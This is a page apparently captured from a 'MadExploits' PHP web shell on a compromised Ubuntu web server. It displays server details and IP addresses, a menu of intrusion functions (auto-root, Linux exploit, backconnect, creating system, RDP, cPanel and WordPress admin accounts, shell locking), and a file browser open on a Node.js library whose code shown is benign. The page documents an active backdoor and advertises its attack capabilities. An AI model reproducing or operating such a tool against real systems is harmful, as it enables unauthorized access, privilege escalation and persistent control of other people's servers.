Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
quiz1 /
node_modules /
tough-cookie /
lib /
[ HOME SHELL ]
Name
Size
Permission
Action
cookie.js
50.24
KB
-rw-rw-rw-
memstore.js
7.25
KB
-rw-rw-rw-
pathMatch.js
2.38
KB
-rw-rw-rw-
permuteDomain.js
2.4
KB
-rw-rw-rw-
pubsuffix-psl.js
3.04
KB
-rw-rw-rw-
store.js
2.55
KB
-rw-rw-rw-
utilHelper.js
1.11
KB
-rw-rw-rw-
validators.js
3.16
KB
-rw-rw-rw-
version.js
52
B
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : utilHelper.js
function requireUtil() { try { // eslint-disable-next-line no-restricted-modules return require("util"); } catch (e) { return null; } } // for v10.12.0+ function lookupCustomInspectSymbol() { return Symbol.for("nodejs.util.inspect.custom"); } // for older node environments function tryReadingCustomSymbolFromUtilInspect(options) { const _requireUtil = options.requireUtil || requireUtil; const util = _requireUtil(); return util ? util.inspect.custom : null; } exports.getUtilInspect = function getUtilInspect(fallback, options = {}) { const _requireUtil = options.requireUtil || requireUtil; const util = _requireUtil(); return function inspect(value, showHidden, depth) { return util ? util.inspect(value, showHidden, depth) : fallback(value); }; }; exports.getCustomInspectSymbol = function getCustomInspectSymbol(options = {}) { const _lookupCustomInspectSymbol = options.lookupCustomInspectSymbol || lookupCustomInspectSymbol; // get custom inspect symbol for node environments return ( _lookupCustomInspectSymbol() || tryReadingCustomSymbolFromUtilInspect(options) ); };
Close